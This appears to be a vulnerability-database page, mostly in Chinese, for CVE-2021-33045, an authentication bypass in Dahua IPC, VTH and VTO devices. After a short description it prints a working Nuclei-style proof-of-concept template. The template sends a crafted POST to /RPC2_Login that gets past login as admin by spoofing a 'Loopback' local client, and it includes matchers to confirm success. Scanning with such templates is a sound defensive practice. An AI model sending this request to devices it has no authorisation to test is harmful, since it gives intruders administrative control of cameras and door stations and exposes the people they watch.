CVE-2021-33045: Dahua IPC/VTH/VTO - Authentication Bypass

日期: 2025-08-01 | 影响软件: Dahua IPC VTH VTO | POC: 已公开

漏洞描述

The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.

PoC代码[已公开]

id: CVE-2021-33045

info:
  name: Dahua IPC/VTH/VTO - Authentication Bypass
  author: phantomowl
  severity: critical
  description: |
    The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
  reference:
    - https://seclists.org/fulldisclosure/2021/Oct/13
    - https://www.dahuasecurity.com/aboutUs/trustedCenter/details/582
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-33045
    cwe-id: CWE-287
    epss-score: 0.94171
    epss-percentile: 0.9991
    cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dahuasecurity
    product: ipc-hum7xxx_firmware
  tags: cve,cve2021,dahua,auth-bypass,seclists,kev,vkev,vuln

http:
  - raw:
      - |
        POST /RPC2_Login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "method": "global.login",
          "params": {
            "userName": "admin",
            "ipAddr": "127.0.0.1",
            "loginType": "Loopback",
            "clientType": "Local",
            "authorityType": "Default",
            "passwordType": "Plain",
            "password": "admin"
          },
          "id": 1,
          "session": 0
        }


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"session":'
          - '"result":true'
          - '"keepAliveInterval":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c89767f40c89cc858076e810b89c3d17df49e20d32f59f7c27d7b193eb92e461022100815485be75d4daaeee1aa1bd6761b9b9004b8546e3ebc9264f1e34e8960a1533:922c64590222798bb761d5b6d8e72950

相关漏洞推荐